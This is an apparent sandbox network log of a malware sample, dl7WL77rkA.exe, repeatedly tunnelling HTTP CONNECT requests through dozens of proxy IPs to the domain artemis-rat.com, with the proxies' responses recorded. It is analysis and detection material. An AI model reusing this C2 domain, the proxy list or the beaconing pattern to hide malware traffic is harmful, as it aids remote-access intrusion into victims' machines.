                                                                                                                                                                                                                                                            1196192.168.2.553315154.205.152.9631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.604193926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.816945076 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1197192.168.2.551493162.214.170.144535483876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.604468107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.608216047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.608477116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.717600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1198192.168.2.553258167.86.69.142363943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.606760025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389419079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405498028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405314922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202037096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1199192.168.2.55329738.162.11.1331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.607213974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.020140886 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1200192.168.2.55330938.162.25.23731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.608834028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.019733906 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1201192.168.2.55331966.45.246.19488883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.611867905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.832782030 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1202192.168.2.553220194.8.232.4641533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.613982916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1203192.168.2.553241113.125.82.1131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626470089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.184598923 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1204192.168.2.553236111.90.150.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626583099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1205192.168.2.553337162.241.45.22635013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626821995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.201765060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1206192.168.2.551560107.180.90.8880783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626885891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796103954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902412891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905211926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1207192.168.2.55328366.29.128.241648103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.627315044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.846324921 CET24INHTTP/1.1 403 #string


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1208192.168.2.551508162.243.55.12509413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.701121092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796350002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902412891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905211926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1209192.168.2.552346117.160.250.13188993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.705374956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796351910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902421951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905230045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1210192.168.2.55331735.79.120.24231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.716937065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.253530979 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1211192.168.2.55328818.135.211.18231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.718342066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.009562969 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1212192.168.2.550808117.160.250.133803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.721338034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889645100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.891024113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.859690905 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.766158104 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.580354929 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1213192.168.2.55329961.110.5.2803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.722119093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.213448048 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
